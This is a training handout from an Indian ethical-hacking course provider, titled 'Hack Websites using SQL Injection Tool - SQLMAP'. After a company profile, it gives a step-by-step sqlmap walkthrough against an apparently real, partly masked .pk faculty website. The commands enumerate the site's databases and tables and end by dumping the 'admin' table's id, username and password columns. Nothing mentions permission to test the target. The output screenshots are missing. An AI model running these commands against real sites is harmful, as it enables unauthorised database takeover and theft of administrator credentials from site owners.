SECUGENIUS SECURITY SOLUTIONS

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing new

ideas to influence the technological minds of the youngsters

Looking at the number of Cyber Crimes since last many years, We at Secugenius Security

Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.

Hack Websites using SQL Injection Tool - SQLMAP

Product ID No: SG/ODL/13029

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni

Secugenius Security Solutions

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

support@secugenius.com, info@secugenius.com

www.secugenius.com , www.seculabs.in

SQLMAP – SQL Injection Tool Sqlmap is developed in Python and it is already available in Backtrack 5 OS Otherwise you can download separately also from sqlmap.org website,

It is the Best Injection Tool With Sqlmap we can easily find database name and type of database i.e. Mysql or SqlServer or any other and we can also find the database name and tables related to that database and we can dump the data from the database.

It is totally a database takeover tool

Step 1 – Go to Backtrack and type this command to open Sqlmap root@bt:~# cd /pentest/database/sqlmap

Step 2 – For Help, we can use “-h” attribute, root@bt:~# ./Sqlmap.py -h

Step 3 – My Vulnerable target is http://******.pk/viewfaculty.php?id=12 To Run SQLMAP, Type this command, root@bt:~# ./Sqlmap.py –u http://*****.pk/viewfaculty.php?id=12

-u Stands for Vulnerable Link

Step 4 – For finding all databases, we use this command, root@bt:~# ./Sqlmap.py –u http://*****.pk/viewfaculty.php?id=12 --dbs

Here’s the output,

Step 5 – And For finding current database, we use “--current-db”

Here’s the output of current Database,

If you write as --dbs then it will fetch all the databases in the server. And if you write --current-db then it will fetch only the database related to the current website.

Step 6 – Now Type this command after getting the database, root@bt:~# ./Sqlmap.py –u http://*****.pk/viewfaculty.php?id=12 –D

c3results --tables

Here, After -D we have to give the database name. --tables means we are trying to fetch the tables in the current database. And we will get the table names.

Here’s the output of the command,

Step 7 – After that we have to fetch only the table information which we required Now Type this command after getting the tables,

root@bt:~# ./Sqlmap.py –u http://*****.pk/viewfaculty.php?id=12 –D

c3results –T admin --columns

We will get the names of columns in that table with datatype

Here’s the output of the command,

Step 8 – root@bt:~# ./Sqlmap.py –u http://*****.pk/viewfaculty.php?id=12 –D

c3results –T admin -C id,password,u_name –dump

Now we will get the total information in the table “admin”

Here’s the output of the command,